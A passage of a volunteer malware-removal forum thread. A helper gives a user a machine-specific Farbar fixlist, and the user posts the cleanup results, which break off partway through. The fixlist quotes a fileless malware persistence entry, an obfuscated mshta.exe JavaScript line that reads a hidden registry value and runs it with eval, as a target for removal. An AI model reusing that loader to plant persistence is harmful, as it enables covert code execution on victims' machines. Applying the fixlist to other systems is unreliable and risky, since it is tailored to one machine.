[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{003028C2-EA1C-4676-A316-B5CB50917002}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{0548C79F-7B8C-455D-B228-97D35371BB62}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{4A1E52AC-64F2-49E9-BFD7-0806D9494DBB}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{61A2027D-B837-4080-A925-6E30E10DEF32}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{78DB07DF-483E-4829-AB44-ED7952083584}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{8A1AB044-787D-4309-8410-709768E484AB}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{A2C55651-A23E-43CA-B63D-C10B99EFF7E0}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{A31F34A1-EBD2-45A2-BF6D-231C1B987CC8}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{BD6ECB00-7C4A-4F97-B425-44117F2A7AAE}
[-] Key deleted: HKU\.DEFAULT\Software\AskPartnerNetwork
[-] Key deleted: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\APN PIP
[-] Key deleted: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Windows Discount
[-] Key deleted: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\AppDataLow\Software\Freecause
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Yahoo\Companion
[#] Key deleted on reboot: HKU\S-1-5-18\Software\AskPartnerNetwork
[#] Key deleted on reboot: HKCU\Software\APN PIP
[#] Key deleted on reboot: HKCU\Software\Windows Discount
[#] Key deleted on reboot: HKCU\Software\AppDataLow\Software\Freecause
[-] Key deleted: HKLM\SOFTWARE\Lavasoft\Web Companion
[-] Key deleted: HKLM\SOFTWARE\PCMedic
[-] Key deleted: HKLM\SOFTWARE\Windows Discount
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Yahoo! SearchSet
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Yahoo\Companion
[#] Key deleted on reboot: [x64] HKCU\Software\APN PIP
[#] Key deleted on reboot: [x64] HKCU\Software\Windows Discount
[#] Key deleted on reboot: [x64] HKCU\Software\AppDataLow\Software\Freecause
[-] Key deleted: HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\7AB5857A57A0687786597A857BFFFFFF
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\7AB5857A57A0687786597A857BFFFFFF
[-] Key deleted: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Internet Explorer\SearchScopes\{587255F6-09F0-4E93-B935-D9A85592C40F}
[-] Key deleted: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[-] Key deleted: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Internet Explorer\SearchScopes\{C10EE16A-FC46-4276-B095-F5DF08F579D4}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{587255F6-09F0-4E93-B935-D9A85592C40F}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{C10EE16A-FC46-4276-B095-F5DF08F579D4}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{587255F6-09F0-4E93-B935-D9A85592C40F}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{C10EE16A-FC46-4276-B095-F5DF08F579D4}
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ask.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\azlyrics.com
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ask.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\azlyrics.com
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net
[-] Value deleted: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Windows\CurrentVersion\Run [Web Companion]
[#] Value deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Web Companion]
[#] Value deleted on reboot: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Web Companion]
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\YCAPlugin.DLL
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\YPUBC.DLL
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\yt.DLL
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\YTabBar.DLL
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\ytbbroker.EXE
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\YTBM.DLL
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\YTMsgr.DLL
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\YTNavAssist.DLL
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\YTSingleInstance.DLL
 
 
***** [ Web browsers ] *****
 
[-] Chrome preferences cleaned: "extensions.toolbar.mindspark.hp.enabled" -  true
[-] Chrome preferences cleaned: "extensions.toolbar.mindspark.hp.enabled.guid" -  "[email protected]"
[-] Chrome preferences cleaned: "extensions.toolbar.mindspark.lastInstalled" -  "[email protected]"
[-] [C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
 
 
*************************
 
:: "Tracing" keys deleted
:: Winsock settings cleared
:: IE policies deleted
:: Chrome policies deleted
:: Chrome preferences reset: C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default
 
*************************
 
C:\AdwCleaner\AdwCleaner[C0].txt - [18414 Bytes] - [27/11/2016 12:59:53]
C:\AdwCleaner\AdwCleaner[R0].txt - [20111 Bytes] - [12/02/2015 22:14:49]
C:\AdwCleaner\AdwCleaner[R1].txt - [1220 Bytes] - [23/02/2015 12:53:13]
C:\AdwCleaner\AdwCleaner[R2].txt - [4743 Bytes] - [02/10/2015 22:33:21]
C:\AdwCleaner\AdwCleaner[R3].txt - [5177 Bytes] - [31/10/2015 15:07:46]
C:\AdwCleaner\AdwCleaner[S0].txt - [19341 Bytes] - [12/02/2015 22:22:43]
C:\AdwCleaner\AdwCleaner[S1].txt - [1310 Bytes] - [23/02/2015 12:58:36]
C:\AdwCleaner\AdwCleaner[S2].txt - [4387 Bytes] - [02/10/2015 22:44:49]
C:\AdwCleaner\AdwCleaner[S3].txt - [5303 Bytes] - [31/10/2015 15:48:52]
C:\AdwCleaner\AdwCleaner[S4].txt - [17802 Bytes] - [27/11/2016 12:53:12]
 
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [19148 Bytes] ##########

  • 0

#10
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
Hi KenBarber

The fixlist looks a bit odd. Did you download the file attached in my post?

We'll try running it again. Your system will reboot when the fix is completed.


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Open notepad and copy/paste the text in the quotebox below into it:

CreateRestorePoint:
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.427\SSScheduler.exe
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [**zbhuduql<*>] => "C:\Users\Kenneth\AppData\Local\0de59\12445.23cd59" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2016-11-01]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.427\SSScheduler.exe (McAfee, Inc.)
AppInit_DLLs-x32: c:\progra~2\amazon\amazon~1\\amazon~3.dll => No File
ShellIconOverlayIdentifiers: [Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => No File
ShellIconOverlayIdentifiers: [Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => No File
ShellIconOverlayIdentifiers: [Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => No File
ShellIconOverlayIdentifiers-x32: [Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => No File
ShellIconOverlayIdentifiers-x32: [Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => No File
ShellIconOverlayIdentifiers-x32: [Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => No File
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {4313FCE4-FD2A-4C18-BB96-4E96F99B196B} URL =
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {587255F6-09F0-4E93-B935-D9A85592C40F} URL =
BHO-x32: No Name -> {39b43360-c1aa-4a02-bb9d-9d41d7dd1531} -> No File
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: No Name -> {89867A4A-BDEE-4259-964A-B8E87C4892F3} -> No File
BHO-x32: No Name -> {D473AEB7-C242-4b00-ABDB-4A6F8D76889E} -> No File
Toolbar: HKLM-x32 - No Name - {39b43360-c1aa-4a02-bb9d-9d41d7dd1531} - No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {6857857C-15D3-435D-AF19-E0217298B416} - No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {EF91116F-DE92-4286-9087-093085152182} - No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {41977804-C772-4713-BD5F-F4C56BF4CE89} - No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {0B9F58EF-90CC-2474-09B9-80B8E9DD43CA} - No File
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\NetRatingsNetSight\NetSight\meter1\FirefoxAddOns\[email protected] => not found
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @nielsen/FirefoxTracker -> C:\Program Files (x86)\NetRatingsNetSight\NetSight\meter1\FirefoxAddOns\npfirefoxtracker.dll [No File]
FF Plugin HKU\S-1-5-21-1169555862-3845460206-1416485692-1000: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\Kenneth\AppData\Roaming\CATALI~2\NPBCSK~1.DLL [No File]
CHR Extension: (PicBadges) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgjkknncnlepghplinfpikcijdbmidbg [2015-02-12] [UpdateUrl: hxxp://static.picbadges.com/plugin/chrome-updates.xml] <==== ATTENTION
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [mgjkknncnlepghplinfpikcijdbmidbg] - C:\Users\Kenneth\AppData\Local\11197219_Setup.crx [2012-08-01]
CHR HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mgjkknncnlepghplinfpikcijdbmidbg] - C:\Users\Kenneth\AppData\Local\11197219_Setup.crx [2012-08-01]
CHR HKLM-x32\...\Chrome\Extension: [bhfhojbhbnajajgihpicejdalbjlpcep] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [mgjkknncnlepghplinfpikcijdbmidbg] - C:\Users\Kenneth\AppData\Local\11197219_Setup.crx [2012-08-01]
S4 CarboniteService; "C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe" [X]
S2 TransferService; "C:\Program Files (x86)\MR APP\MRAPP.Transfer.Service.exe" [X]
S4 LMIRfsClientNP; no ImagePath
S3 AODDriver4.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S3 cpuz134; \??\C:\Users\Kenneth\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X]
S3 NAVENG; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\SDSDefs\20160701.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\SDSDefs\20160701.001\EX64.SYS [X]
S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\TurboYourPC\Service.sys [X]
C:\Program Files\Carbonite
C:\Program Files (x86)\MR APP
C:\Program Files (x86)\TurboYourPC
C:\Users\Kenneth\AppData\Local\0de59
C:\Users\Kenneth\Downloads\Firefox Setup Stub 50.0.exe
C:\Users\Kenneth\Downloads\Firefox Setup Stub 50.0 (1).exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
C:\Program Files\McAfee Security Scan
C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
C:\Users\Kenneth\AppData\Local\11197219_Setup.crx
C:\Users\Kenneth\AppData\Local\BcsKtYcHW.dll
Uninstall Helper (x32 Version: 2.0.1.0 - InstallX, LLC) Hidden <==== ATTENTION
Task: {0867B664-EF32-42F5-8757-C15E298A230B} - System32\Tasks\{6618EADD-5989-4B12-8B04-AA89D2E1DBD4} => pcalua.exe -a C:\Users\Kenneth\Downloads\jxpiinstall(3).exe -d C:\Users\Kenneth\Downloads
Task: {219B9AB8-6B65-49C1-A3D9-0C452968D8BF} - System32\Tasks\{42B4231A-778C-4762-8421-2BAE54306AE0} => pcalua.exe -a E:\setup.exe -d E:\
Task: {CC7E65C3-6361-4D7E-B8AC-593EC7CDC357} - \ReimageUpdater -> No File <==== ATTENTION
Task: {EDED2E7E-A3D1-46D0-8A2E-94E32A2E3006} - System32\Tasks\Optimum_LogOn => C:\Program Files (x86)\Optimum PC Boost\OptimumPCBoost.exe <==== ATTENTION
Task: {FAA3495A-3D90-4C80-BE45-F8DE4E9C9DFE} - \Optimum_Daily -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:9A870F8B [1026]
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Classes\f8352: "C:\Windows\system32\mshta.exe" "javascript:XxlS4cy="HKwVZ";O8J=new ActiveXObject("WScript.Shell");d4j0JLhge="QDOFAhq";WKvH9=O8J.RegRead("HKCU\\software\\ukrhxxcou\\juhzam");sQy6IohL="B1e";eval(WKvH9);mnuifr2W="siKZsvU";" <===== ATTENTION
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
Hosts:
RemoveProxy:
CMD: ipconfig /flushdns
CMD: ipconfig /release
CMD: ipconfig /renew
EmptyTemp:

  • Save this as fixlist.txt, in the same location as FRST.exe on your desktop.
    FRSTfix.JPG
  • Run FRST by right clicking on it and selecting Run as Administrator and press Fix
  • On completion a log (fixlog.txt) will be generated.
  • Please select all text in this fix, copy (CTRL + C) and then Paste (CTRL + V) in your next reply.

  • 0

Advertisements


#11
kenbarber

kenbarber

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 116 posts

well i certainly think i did. should i re-download them again to be sure i got the right one?  


  • 0

#12
Bruce1270

Bruce1270

    Trusted Helper

  • Malware Removal
  • 1,603 posts
If you can use the text within the quotes in my last post #10 and copy all of it to notepad and follow the rest of the instructions to run it. :)
  • 0

#13
kenbarber

kenbarber

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 116 posts

hope this is less odd.  

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 27-11-2016
Ran by Kenneth (27-11-2016 16:24:16) Run:4
Running from C:\Users\Kenneth\Desktop
Loaded Profiles: Kenneth (Available Profiles: Kenneth & LogMeInRemoteUser)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CreateRestorePoint:
(McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.11.427\SSScheduler.exe
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\...\Run: [**zbhuduql<*>] => "C:\Users\Kenneth\AppData\Local\0de59\12445.23cd59" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk [2016-11-01]
ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.11.427\SSScheduler.exe (McAfee, Inc.)
AppInit_DLLs-x32: c:\progra~2\amazon\amazon~1\\amazon~3.dll => No File
ShellIconOverlayIdentifiers: [Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => No File
ShellIconOverlayIdentifiers: [Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => No File
ShellIconOverlayIdentifiers: [Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => No File
ShellIconOverlayIdentifiers-x32: [Carbonite.Green] -> {95A27763-F62A-4114-9072-E81D87DE3B68} => No File
ShellIconOverlayIdentifiers-x32: [Carbonite.Partial] -> {E300CD91-100F-4E67-9AF3-1384A6124015} => No File
ShellIconOverlayIdentifiers-x32: [Carbonite.Yellow] -> {5E529433-B50E-4bef-A63B-16A6B71B071A} => No File
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {4313FCE4-FD2A-4C18-BB96-4E96F99B196B} URL =
SearchScopes: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> {587255F6-09F0-4E93-B935-D9A85592C40F} URL =
BHO-x32: No Name -> {39b43360-c1aa-4a02-bb9d-9d41d7dd1531} -> No File
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: No Name -> {89867A4A-BDEE-4259-964A-B8E87C4892F3} -> No File
BHO-x32: No Name -> {D473AEB7-C242-4b00-ABDB-4A6F8D76889E} -> No File
Toolbar: HKLM-x32 - No Name - {39b43360-c1aa-4a02-bb9d-9d41d7dd1531} - No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {6857857C-15D3-435D-AF19-E0217298B416} - No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {EF91116F-DE92-4286-9087-093085152182} - No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {41977804-C772-4713-BD5F-F4C56BF4CE89} - No File
Toolbar: HKU\S-1-5-21-1169555862-3845460206-1416485692-1000 -> No Name - {0B9F58EF-90CC-2474-09B9-80B8E9DD43CA} - No File
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\NetRatingsNetSight\NetSight\meter1\FirefoxAddOns\[email protected] => not found
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @nielsen/FirefoxTracker -> C:\Program Files (x86)\NetRatingsNetSight\NetSight\meter1\FirefoxAddOns\npfirefoxtracker.dll [No File]
FF Plugin HKU\S-1-5-21-1169555862-3845460206-1416485692-1000: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\Kenneth\AppData\Roaming\CATALI~2\NPBCSK~1.DLL [No File]
CHR Extension: (PicBadges) - C:\Users\Kenneth\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgjkknncnlepghplinfpikcijdbmidbg [2015-02-12] [UpdateUrl: hxxp://static.picbadges.com/plugin/chrome-updates.xml] <==== ATTENTION
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [mgjkknncnlepghplinfpikcijdbmidbg] - C:\Users\Kenneth\AppData\Local\11197219_Setup.crx [2012-08-01]
CHR HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [mgjkknncnlepghplinfpikcijdbmidbg] - C:\Users\Kenneth\AppData\Local\11197219_Setup.crx [2012-08-01]
CHR HKLM-x32\...\Chrome\Extension: [bhfhojbhbnajajgihpicejdalbjlpcep] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [mgjkknncnlepghplinfpikcijdbmidbg] - C:\Users\Kenneth\AppData\Local\11197219_Setup.crx [2012-08-01]
S4 CarboniteService; "C:\Program Files\Carbonite\Carbonite Backup\carboniteservice.exe" [X]
S2 TransferService; "C:\Program Files (x86)\MR APP\MRAPP.Transfer.Service.exe" [X]
S4 LMIRfsClientNP; no ImagePath
S3 AODDriver4.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X]
S3 cpuz134; \??\C:\Users\Kenneth\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X]
S3 NAVENG; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\SDSDefs\20160701.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\SDSDefs\20160701.001\EX64.SYS [X]
S3 WinRing0_1_2_0; \??\C:\Program Files (x86)\TurboYourPC\Service.sys [X]
C:\Program Files\Carbonite
C:\Program Files (x86)\MR APP
C:\Program Files (x86)\TurboYourPC
C:\Users\Kenneth\AppData\Local\0de59
C:\Users\Kenneth\Downloads\Firefox Setup Stub 50.0.exe
C:\Users\Kenneth\Downloads\Firefox Setup Stub 50.0 (1).exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
C:\Program Files\McAfee Security Scan
C:\Users\Public\Desktop\McAfee Security Scan Plus.lnk
C:\Users\Kenneth\AppData\Local\11197219_Setup.crx
C:\Users\Kenneth\AppData\Local\BcsKtYcHW.dll
Uninstall Helper (x32 Version: 2.0.1.0 - InstallX, LLC) Hidden <==== ATTENTION
Task: {0867B664-EF32-42F5-8757-C15E298A230B} - System32\Tasks\{6618EADD-5989-4B12-8B04-AA89D2E1DBD4} => pcalua.exe -a C:\Users\Kenneth\Downloads\jxpiinstall(3).exe -d C:\Users\Kenneth\Downloads
Task: {219B9AB8-6B65-49C1-A3D9-0C452968D8BF} - System32\Tasks\{42B4231A-778C-4762-8421-2BAE54306AE0} => pcalua.exe -a E:\setup.exe -d E:\
Task: {CC7E65C3-6361-4D7E-B8AC-593EC7CDC357} - \ReimageUpdater -> No File <==== ATTENTION
Task: {EDED2E7E-A3D1-46D0-8A2E-94E32A2E3006} - System32\Tasks\Optimum_LogOn => C:\Program Files (x86)\Optimum PC Boost\OptimumPCBoost.exe <==== ATTENTION
Task: {FAA3495A-3D90-4C80-BE45-F8DE4E9C9DFE} - \Optimum_Daily -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:9A870F8B [1026]
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Classes\f8352: "C:\Windows\system32\mshta.exe" "javascript:XxlS4cy="HKwVZ";O8J=new ActiveXObject("WScript.Shell");d4j0JLhge="QDOFAhq";WKvH9=O8J.RegRead("HKCU\\software\\ukrhxxcou\\juhzam");sQy6IohL="B1e";eval(WKvH9);mnuifr2W="siKZsvU";" <===== ATTENTION
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
Hosts:
RemoveProxy:
CMD: ipconfig /flushdns
CMD: ipconfig /release
CMD: ipconfig /renew
EmptyTemp:
*****************
 
Restore point was successfully created.
[5940] C:\Program Files\McAfee Security Scan\3.11.427\SSScheduler.exe => process closed successfully.
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**zbhuduql<*> => value removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk => moved successfully
C:\Program Files\McAfee Security Scan\3.11.427\SSScheduler.exe => moved successfully
"c:\progra~2\amazon\amazon~1\\amazon~3.dll" => Value data removed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Carbonite.Green" => key removed successfully
HKCR\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68} => key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Carbonite.Partial" => key removed successfully
HKCR\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015} => key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Carbonite.Yellow" => key removed successfully
HKCR\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A} => key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Carbonite.Green" => key removed successfully
HKCR\Wow6432Node\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68} => key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Carbonite.Partial" => key removed successfully
HKCR\Wow6432Node\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015} => key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\Carbonite.Yellow" => key removed successfully
HKCR\Wow6432Node\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A} => key not found. 
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{4313FCE4-FD2A-4C18-BB96-4E96F99B196B}" => key removed successfully
HKCR\CLSID\{4313FCE4-FD2A-4C18-BB96-4E96F99B196B} => key not found. 
HKU\S-1-5-21-1169555862-3845460206-1416485692-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{587255F6-09F0-4E93-B935-D9A85592C40F} => key not found. 
HKCR\CLSID\{587255F6-09F0-4E93-B935-D9A85592C40F} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{39b43360-c1aa-4a02-bb9d-9d41d7dd1531}" => key removed successfully
HKCR\Wow6432Node\CLSID\{39b43360-c1aa-4a02-bb9d-9d41d7dd1531} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{89867A4A-BDEE-4259-964A-B8E87C4892F3}" => key removed successfully
HKCR\Wow6432Node\CLSID\{89867A4A-BDEE-4259-964A-B8E87C4892F3} => key not found. 
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{D473AEB7-C242-4b00-ABDB-4A6F8D76889E}" => key removed successfully
HKCR\Wow6432Node\CLSID\{D473AEB7-C242-4b00-ABDB-4A6F8D76889E} => key not found. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{39b43360-c1aa-4a02-bb9d-9d41d7dd1531} => value removed successfully
